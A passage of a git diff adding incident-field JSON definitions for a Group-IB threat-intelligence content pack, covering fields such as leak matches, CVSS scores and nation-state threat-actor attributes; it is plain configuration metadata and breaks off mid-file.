b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Matches_Table.json @@ -0,0 +1,81 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Public Leak" + ], + "caseInsensitive": true, + "cliName": "gibmatchestable", + "closeForm": true, + "columns": [ + { + "displayName": "Type", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "type", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Sub Type", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "subtype", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Value", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "value", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + } + ], + "content": true, + "defaultRows": [ + {} + ], + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibmatchestable", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Matches Table", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Public Leak" + ], + "threshold": 72, + "type": "grid", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Merged_Cvss.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Merged_Cvss.json new file mode 100644 index 000000000000..2dea8a43d45b --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Merged_Cvss.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability" + ], + "caseInsensitive": true, + "cliName": "gibmergedcvss", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibmergedcvss", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Merged Cvss", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability" + ], + "threshold": 72, + "type": "number", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Mirror_Link.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Mirror_Link.json new file mode 100644 index 000000000000..3bf53f4e26db --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Mirror_Link.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Deface" + ], + "caseInsensitive": true, + "cliName": "gibmirrorlink", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibmirrorlink", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Mirror Link", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Deface" + ], + "threshold": 72, + "type": "url", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Name_Servers.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Name_Servers.json index 015e54309fb6..de86e28b7137 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Name_Servers.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Name_Servers.json @@ -25,5 +25,10 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Domain" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminal_Forums_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminal_Forums_Table.json new file mode 100644 index 000000000000..6c3a061ed6a9 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminal_Forums_Table.json @@ -0,0 +1,67 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "caseInsensitive": true, + "cliName": "gibnationstatecybercriminalforumstable", + "closeForm": true, + "columns": [ + { + "displayName": "Nickname", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "nickname", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 302 + }, + { + "displayName": "URL", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "url", + "orgType": "url", + "required": false, + "script": "", + "selectValues": null, + "type": "url", + "width": 150 + } + ], + "content": true, + "defaultRows": [ + {} + ], + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibnationstatecybercriminalforumstable", + "isReadOnly": false, + "locked": false, + "name": "GIB Nation-State Cybercriminal Forums Table", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "threshold": 72, + "type": "grid", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Expertises.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Expertises.json new file mode 100644 index 000000000000..0bb4fa56fc8d --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Expertises.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Nation-State Cybercriminals Threat Actor" + ], + "caseInsensitive": true, + "cliName": "gibnationstatecybercriminalsexpertises", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibnationstatecybercriminalsexpertises", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Nation-State Cybercriminals Expertises", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Nation-State Cybercriminals Threat Actor" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Malware.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Malware.json new file mode 100644 index 000000000000..165c4fc852ce --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Malware.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Nation-State Cybercriminals Threat Actor" + ], + "caseInsensitive": true, + "cliName": "gibnationstatecybercriminalsmalware", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibnationstatecybercriminalsmalware", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Nation-State Cybercriminals Malware", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Nation-State Cybercriminals Threat Actor" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Regions.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Regions.json new file mode 100644 index 000000000000..c818949c6bf0 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Regions.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Nation-State Cybercriminals Threat Actor" + ], + "caseInsensitive": true, + "cliName": "gibnationstatecybercriminalsregions", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibnationstatecybercriminalsregions", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Nation-State Cybercriminals Regions", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Nation-State Cybercriminals Threat Actor" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Sectors.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Sectors.json new file mode 100644 index 000000000000..053b1df0dbc9 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Sectors.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Nation-State Cybercriminals Threat Actor" + ], + "caseInsensitive": true, + "cliName": "gibnationstatecybercriminalssectors", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibnationstatecybercriminalssectors", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Nation-State Cybercriminals Sectors", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Nation-State Cybercriminals Threat Actor" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Aliases.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Aliases.json new file mode 100644 index 000000000000..f2fa771462ff --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Aliases.json @@ -0,0 +1,35 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Nation-State Cybercriminals Threat Actor" + ], + "caseInsensitive": true, + "cliName": "gibnationstatecybercriminalsthreatactoraliases", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "gibnationstatecybercriminalsthreatactoraliases", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Nation-State Cybercriminals Threat Actor Aliases", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Nation-State Cybercriminals Threat Actor" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "5.0.0", + "toVersion": "99.99.99" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_CVE.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_CVE.json new file mode 100644 index 000000000000..643693e0c24e --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_CVE.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Nation-State Cybercriminals Threat Actor" + ], + "caseInsensitive": true, + "cliName": "gibnationstatecybercriminalsthreatactorcve", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibnationstatecybercriminalsthreatactorcve", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Nation-State Cybercriminals Threat Actor CVE", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Nation-State Cybercriminals Threat Actor" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Country.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Country.json new file mode 100644 index 000000000000..408a702d428f --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Country.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Nation-State Cybercriminals Threat Actor" + ], + "caseInsensitive": true, + "cliName": "gibnationstatecybercriminalsthreatactorcountry", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibnationstatecybercriminalsthreatactorcountry", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Nation-State Cybercriminals Threat Actor Country", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Nation-State Cybercriminals Threat Actor" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Description.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Description.json new file mode 100644 index 000000000000..f0b6659c206f --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Description.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Nation-State Cybercriminals Threat Actor" + ], + "caseInsensitive": true, + "cliName": "gibnationstatecybercriminalsthreatactordescription", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibnationstatecybercriminalsthreatactordescription", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Nation-State Cybercriminals Threat Actor Description", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Nation-State Cybercriminals Threat Actor" + ], + "threshold": 72, + "type": "longText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Goals.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Goals.json new file mode 100644 index 000000000000..d43a61fb1911 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Goals.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Nation-State Cybercriminals Threat Actor" + ], + "caseInsensitive": true, + "cliName": "gibnationstatecybercriminalsthreatactorgoals", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibnationstatecybercriminalsthreatactorgoals", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Nation-State Cybercriminals Threat Actor Goals", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Nation-State Cybercriminals Threat Actor" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Labels.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Labels.json new file mode 100644 index 000000000000..c7c84ef417cf --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Labels.json @@ -0,0 +1,36 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Nation-State Cybercriminals Threat Actor", + "GIB Nation-State Cybercriminals Threat" + ], + "caseInsensitive": true, + "cliName": "gibnationstatecybercriminalsthreatactorlabels", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibnationstatecybercriminalsthreatactorlabels", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Nation-State Cybercriminals Threat Actor Labels", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Nation-State Cybercriminals Threat Actor", + "GIB Nation-State Cybercriminals Threat" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Reports_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Reports_Table.json new file mode 100644 index 000000000000..edbbc63cbb7f --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Reports_Table.json @@ -0,0 +1,80 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Nation-State Cybercriminals Threat Actor" + ], + "caseInsensitive": true, + "cliName": "gibnationstatecybercriminalsthreatactorreportstable", + "closeForm": true, + "columns": [ + { + "displayName": "ID", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "id", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Name", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "name", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Date Published", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "datepublished", + "orgType": "date", + "required": false, + "script": "", + "selectValues": null, + "type": "date", + "width": 150 + } + ], + "content": true, + "defaultRows": [ + {} + ], + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibnationstatecybercriminalsthreatactorreportstable", + "isReadOnly": false, + "locked": false, + "name": "GIB Nation-State Cybercriminals Threat Actor Reports Table", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Nation-State Cybercriminals Threat Actor" + ], + "threshold": 72, + "type": "grid", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Roles.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Roles.json new file mode 100644 index 000000000000..b92f2e21eb2e --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Roles.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Nation-State Cybercriminals Threat Actor" + ], + "caseInsensitive": true, + "cliName": "gibnationstatecybercriminalsthreatactorroles", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibnationstatecybercriminalsthreatactorroles", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Nation-State Cybercriminals Threat Actor Roles", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Nation-State Cybercriminals Threat Actor" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Countries.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Countries.json new file mode 100644 index 000000000000..42581c8aed4c --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Countries.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "caseInsensitive": true, + "cliName": "gibnationstatecybercriminalsthreatcountries", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibnationstatecybercriminalsthreatcountries", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Nation-State Cybercriminals Threat Countries", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Description.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Description.json new file mode 100644 index 000000000000..0dc9e6a54f7f --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Description.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "caseInsensitive": true, + "cliName": "gibnationstatecybercriminalsthreatdescription", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibnationstatecybercriminalsthreatdescription", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Nation-State Cybercriminals Threat Description", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "threshold": 72, + "type": "longText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Expertises.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Expertises.json new file mode 100644 index 000000000000..a9f752f1798b --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Expertises.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "caseInsensitive": true, + "cliName": "gibnationstatecybercriminalsthreatexpertises", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibnationstatecybercriminalsthreatexpertises", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Nation-State Cybercriminals Threat Expertises", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Langs.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Langs.json new file mode 100644 index 000000000000..a327fb9f87b2 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Langs.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "caseInsensitive": true, + "cliName": "gibnationstatecybercriminalsthreatlangs", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibnationstatecybercriminalsthreatlangs", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Nation-State Cybercriminals Threat Langs", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Regions.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Regions.json new file mode 100644 index 000000000000..c87ca1a96661 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Regions.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "caseInsensitive": true, + "cliName": "gibnationstatecybercriminalsthreatregions", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibnationstatecybercriminalsthreatregions", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Nation-State Cybercriminals Threat Regions", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Report_Number.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Report_Number.json new file mode 100644 index 000000000000..ce7543bfcde3 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Report_Number.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "caseInsensitive": true, + "cliName": "gibnationstatecybercriminalsthreatreportnumber", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": 